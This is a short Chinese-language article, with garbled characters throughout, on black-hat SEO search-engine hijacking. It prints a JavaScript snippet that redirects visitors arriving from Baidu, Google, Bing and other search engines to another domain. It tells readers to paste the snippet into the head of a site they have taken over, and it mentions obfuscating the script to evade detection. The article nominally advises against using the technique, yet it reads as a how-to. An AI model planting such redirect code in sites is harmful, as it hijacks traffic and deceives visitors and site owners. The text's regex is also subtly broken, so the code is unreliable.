黑帽SEO劫持手法簡要分析[附代碼]

搜索引擎劫持簡稱搜索劫持，其實(shí)就是從搜索引擎來的流量自動(dòng)跳轉(zhuǎn)到指定的網(wǎng)頁。可以通過未經(jīng)用戶授權(quán)，自動(dòng)修改第三方搜索引擎結(jié)果的軟件實(shí)現(xiàn)，通常這類程序會(huì)在第三方搜索引擎的結(jié)果中添加自己的廣告或加入網(wǎng)站鏈接獲取流量等。也可以通過如下搜索引擎劫持代碼實(shí)現(xiàn)（屬于黑帽SEO需要掌握被劫持網(wǎng)站權(quán)限，建議不要使用）。

以上是百度百科對搜索引擎劫持的解釋。實(shí)戰(zhàn)派的不要太去在意這些理論，沒多大用處。

這里簡要分析搜索引擎劫持中的JS劫持。我在這簡要說一種，說多了，新手容易蒙圈。在這里我以一個(gè)網(wǎng)站舉例說明，認(rèn)為是廣告的直接關(guān)掉頁面。當(dāng)一個(gè)用戶在百度里面搜索一個(gè)關(guān)鍵詞“口罩機(jī)”，你會(huì)看到a.com這個(gè)域名的網(wǎng)站，你點(diǎn)擊進(jìn)去他會(huì)自動(dòng)跳轉(zhuǎn)到www.b.com這個(gè)域名上去。但是當(dāng)你直接輸入域名a.com時(shí)候，你直接打開a.com這個(gè)網(wǎng)站的內(nèi)容。這就是JS劫持。

是怎么實(shí)現(xiàn)的呢？我把最簡單的JS代碼粘貼出來。

<script type="text/javascript">

var regexp=/.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(.[a-z0-9-]+){1,2}//ig;

var where =document.referrer;

if(regexp.test(where))

{

window.location.href='http://www.a.com/'

}

</script>

你把此段代碼復(fù)制到需要劫持的網(wǎng)站</head>之前就可以上述功能，這JS代碼為了躲避搜索引擎的識(shí)別會(huì)有很多變種，應(yīng)用的技術(shù)有字符串拼接拆分、字符串編碼轉(zhuǎn)化、加密等，但基本都是上面原理的變種，通過判斷來路來給用戶展現(xiàn)不同的頁面。